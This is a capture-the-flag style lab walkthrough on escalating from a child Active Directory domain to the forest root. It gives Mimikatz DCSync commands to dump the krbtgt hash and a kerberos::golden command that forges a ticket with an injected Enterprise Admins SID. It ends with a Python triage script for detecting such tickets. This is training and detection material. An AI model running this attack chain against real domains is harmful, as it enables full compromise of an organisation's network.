Exploiting domain trusts

A forest, in Active Directory terms, consists of domain trees. Trusts define how domains in a forest can talk to one another. The main types of trusts are:

  • Directional: Trust flows from one domain to another trusted domain

  • Transitive: Trust flows between multiple trusted domains

KRBTGT and Golden tickets

If an attacker compromises a domain controller and achieves full SYSTEM rights, it is possible to extract the hash of the krbtgt account. This would allow the attacker to forge Kerberos TGTs (golden tickets) and, with them, obtain TGS tickets for any resources they choose.

In order to create golden tickets, the following must be known:

  • FQDN of the domain

  • SID of the domain

  • Username to impersonate

  • KRBTGT hash

The first three are usually easy to recover. The last one requires a domain compromise since the KRBTGT password hash is only stored on domain controllers.

Dumping the KRBTGT hash

Use the RDP session on THMSERVER2 to recover the KRBTGT password hash using Mimikatz with DCSync:

C:\Tools>mimikatz_trunk\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::dcsync /user:za\krbtgt
[DC] 'za.tryhackme.loc' will be the domain
[DC] 'THMDC.za.tryhackme.loc' will be the DC server
[DC] 'za\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 4/25/2022 7:18:22 PM
Object Security ID   : S-1-5-21-3885271727-2693558621-2658995185-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: removed
    ntlm- 0: removed
    lm  - 0: removed
...

Getting the SIDs

Recover two SIDs:

  • The SID of the child domain controller (THMDC), to be impersonated in the forged TGT

  • The SID of the Enterprise Admins in the parent domain, to be added as an extra SID to the forged TGT

Use the AD-RSAT PowerShell cmdlets to recover the SID of the child domain controller:

PS C:\> Get-ADComputer -Identity "THMDC"

DistinguishedName : CN=THMDC,OU=Domain Controllers,DC=za,DC=tryhackme,DC=loc
DNSHostName       : THMDC.za.tryhackme.loc
Enabled           : True
Name              : THMDC
ObjectClass       : computer
ObjectGUID        : bd651750-782b-4b09-93b4-b5987ec7311b
SamAccountName    : THMDC$
SID               : S-1-5-21-3885271727-2693558621-2658995185-1001
UserPrincipalName :

Recover the SID of the Enterprise Admins group by querying the parent domain controller:

PS C:\> Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.tryhackme.loc

DistinguishedName : CN=Enterprise Admins,CN=Users,DC=tryhackme,DC=loc
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : a23ae384-16e8-44d5-9b36-8173c4e0e5de
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3330634377-removed-519

Exploiting domain trusts

Use Mimikatz to generate a golden ticket.

mimikatz # kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt

Try browsing the remote file system of \\thmrootdc.tryhackme.loc\C$ (the UNC path to the C$ share). The flag is on THMROOTDC in the Administrator’s Desktop folder (flag6.txt).
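As an added example (not part of the original room), a Python triage pass over constructed event records showing how a defender could spot the forged TGT above: it flags a parent-domain Enterprise Admins SID (RID 519) turning up in a child-domain account's token, and the RC4 (0x17) tickets that a /rc4 golden ticket produces. The record fields, the sample accounts and the parent domain SID assembled from the /sids value on the page are assumptions of this example.

```python
# Standard Windows RIDs of groups that must never arrive via a foreign domain's PAC.
PRIVILEGED_RIDS = {"512": "Domain Admins", "518": "Schema Admins", "519": "Enterprise Admins"}

def split_sid(sid):
    """Return (domain SID, RID) for a domain SID such as S-1-5-21-...-519."""
    if not sid.startswith("S-1-5-21-"):
        return None
    dom, _, rid = sid.rpartition("-")
    return dom, rid

def check_logon(event, parent_domain_sid):
    findings = []
    name = event.get("TargetUserName", "?")
    own = split_sid(event.get("TargetUserSid", ""))
    for extra in event.get("GroupSids", []):
        parts = split_sid(extra)
        if parts is None:
            continue
        dom, rid = parts
        # A privileged parent-domain SID on an account outside that domain is what /sids
        # injects into the forged TGT; intra-forest trusts do not SID-filter it by default.
        if dom == parent_domain_sid and rid in PRIVILEGED_RIDS and (own is None or own[0] != dom):
            findings.append(f"{name}: token carries {PRIVILEGED_RIDS[rid]} of {dom}")
    # Tickets forged with /rc4 are RC4-HMAC (0x17): a signal where accounts use AES.
    if event.get("TicketEncryptionType", "").lower() == "0x17":
        findings.append(f"{name}: RC4 (0x17) ticket where AES is expected")
    return findings

PARENT_DOMAIN_SID = "S-1-5-21-3330634377-1326264276-632209373"  # parent domain SID from the page
# Constructed sample records; the field names are this example's own flattening
# of 4627 (group membership) and 4769 (ticket encryption type) event data.
SAMPLE_EVENTS = [
    {"TargetUserName": "Administrator",
     "TargetUserSid": "S-1-5-21-3885271727-2693558621-2658995185-500",
     "GroupSids": ["S-1-5-21-3330634377-1326264276-632209373-519"],
     "TicketEncryptionType": "0x17"},
    {"TargetUserName": "svc_backup",
     "TargetUserSid": "S-1-5-21-3330634377-1326264276-632209373-1105",
     "GroupSids": ["S-1-5-21-3330634377-1326264276-632209373-513"],
     "TicketEncryptionType": "0x12"},
]

def triage(events, parent_domain_sid=PARENT_DOMAIN_SID):
    """Flagged account name -> findings; accounts with no findings are omitted."""
    out = {}
    for ev in events:
        hits = check_logon(ev, parent_domain_sid)
        if hits:
            out[ev["TargetUserName"]] = hits
    return out
```

Enabling "Audit Group Membership" and "Audit Kerberos Service Ticket Operations" on the parent DC is what makes the two fields this logic keys on available in the Security log.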